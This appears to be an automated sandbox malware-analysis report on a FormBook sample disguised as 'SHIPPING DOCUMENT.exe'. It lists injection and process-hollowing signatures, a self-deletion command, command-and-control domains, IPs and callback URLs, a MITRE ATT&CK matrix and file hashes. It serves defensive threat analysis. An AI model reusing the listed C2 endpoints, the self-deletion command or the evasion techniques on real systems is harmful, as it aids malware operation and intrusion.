          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038FF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038FF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038FF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0395B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03998CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038C58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039814FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03994015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03994015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_100014EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.barkinlot.com
Source: C:\Windows\explorer.exe | Domain query: www.buyruon.com
Source: C:\Windows\explorer.exe | Network Connect: 107.151.79.234 80
Source: C:\Windows\explorer.exe | Domain query: www.union-green.com
Source: C:\Windows\explorer.exe | Network Connect: 154.220.41.208 80
Source: C:\Windows\explorer.exe | Domain query: www.fuerzaagavera.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 64.190.62.111 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Section loaded: unknown target: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: D60000
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Process created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
Source: explorer.exe, 00000004.00000000.662030709.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.916246710.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.917173995.0000000004B30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.680444387.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Digits appended to a technique name are the matched-signature count badges shown in the matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Access Token Manipulation1 | Rootkit1 | Credential API Hooking1 | Security Software Discovery231 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection512 | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | System Network Configuration Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Network Connections Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 404217 | Sample: SHIPPING DOCUMENT.exe | Startdate: 04/05/2021 | Architecture: WINDOWS | Score: 100

Start
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
  -> SHIPPING DOCUMENT.exe [19] (started)
       Dropped file: C:\Users\user\AppData\Local\...\2x6gdfzk.dll, PE32
       Signatures: Maps a DLL or memory area into another process
       -> SHIPPING DOCUMENT.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 DNS/IP: www.barkinlot.com 107.151.79.234, 49754, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK United States; www.union-green.com 154.220.41.208, 49766, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles; 4 other IPs or domains
                 Signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
                 -> NETSTAT.EXE (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe [1] (started)
                           -> conhost.exe (started)
                 -> autofmt.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
SHIPPING DOCUMENT.exe | 34% | Virustotal |
SHIPPING DOCUMENT.exe | 45% | ReversingLabs | Win32.Trojan.Predator
SHIPPING DOCUMENT.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll | 17% | ReversingLabs | Win32.Trojan.Jaik

          Unpacked PE Files

Source | Detection | Scanner | Label
0.2.SHIPPING DOCUMENT.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.0.SHIPPING DOCUMENT.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
1.1.SHIPPING DOCUMENT.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.SHIPPING DOCUMENT.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.SHIPPING DOCUMENT.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
8.2.NETSTAT.EXE.32de860.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
8.2.NETSTAT.EXE.3dcf834.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

Source | Detection | Scanner | Label
www.barkinlot.com | 0% | Virustotal |
www.union-green.com | 0% | Virustotal |
www.fuerzaagavera.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.union-green.com/dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.yabovip1288.com | 0% | Avira URL Cloud | safe
www.knighttechinca.com/dxe/ | 0% | Avira URL Cloud | safe
http://www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.barkinlot.com/dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.buyruon.com/dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.barkinlot.com | 107.151.79.234 | true | true | | unknown
www.union-green.com | 154.220.41.208 | true | true | | unknown
www.fuerzaagavera.com | 64.190.62.111 | true | true | | unknown
buyruon.com | 34.102.136.180 | true | false | | unknown
www.buyruon.com | unknown | unknown | true | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.union-green.com/dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J | true | Avira URL Cloud: safe | unknown
www.knighttechinca.com/dxe/ | true | Avira URL Cloud: safe | low
http://www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J | true | Avira URL Cloud: safe | unknown
http://www.barkinlot.com/dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J | true | Avira URL Cloud: safe | unknown
http://www.buyruon.com/dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J | false | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_ | NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | SHIPPING DOCUMENT.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.yabovip1288.com | NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | SHIPPING DOCUMENT.exe | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5 | NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmp | false | | high

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
107.151.79.234 | www.barkinlot.com | United States | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
154.220.41.208 | www.union-green.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
34.102.136.180 | buyruon.com | United States | 15169 | GOOGLEUS | false
64.190.62.111 | www.fuerzaagavera.com | United States | 11696 | NBS11696US | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:404217
                                          Start date:04.05.2021
                                          Start time:20:09:44
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 58s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:SHIPPING DOCUMENT.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@8/4@4/5
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 29% (good quality ratio 26.4%)
                                          • Quality average: 74.8%
                                          • Quality standard deviation: 31.1%
                                          HCA Information:
                                          • Successful, ratio: 90%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs


                                          Domains

Match                Associated Sample Name / URL                  Detection  Context
www.union-green.com  REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe  malicious  154.220.41.208

                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\ex08fobkizb
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.974118270734614
                                          Encrypted:false
                                          SSDEEP:192:CM79ZiFYzt3oSmJndTNzwT4JDPB9QB8Fbwlq:7iFkYJdTmUJ77wlq
                                          MD5:69CF51438619322E76E52330708D6476
                                          SHA1:CF68FE09A25AD784EACD51430B02EFFD02B9E836
                                          SHA-256:B138964C634ECA75042FEE97E056E25FDB7BED585ED1CA2C883CAFFC28184F6F
                                          SHA-512:09CA224E6EAF25BB470F56BA6F1A8EE39296F45D0B56555698C5C35250FE45ACC99CAEBE641E91156C5887D09D768B81B7D3FF9D4A0BDDFE9AC7B77FD13A7B47
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Temp\kmvt65sofzhcy6
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.999109498781475
                                          Encrypted:true
                                          SSDEEP:3072:d7DdGNe8lzSGePvjqjjGdz2YruLwmPrghVxoMb6im3Ygvadup37:d7DdGNblz7SLqXGdB8HUl613Y1du17
                                          MD5:AACE68FCC1505963CA9578E8AB837594
                                          SHA1:E0EE89C6AE7AC02CED2731C35B4BA81BD3A441CC
                                          SHA-256:1AD3F5A4C5BECBADD1E7C87DCFEE1330A604964B0918FD24DD77E1253476BFE8
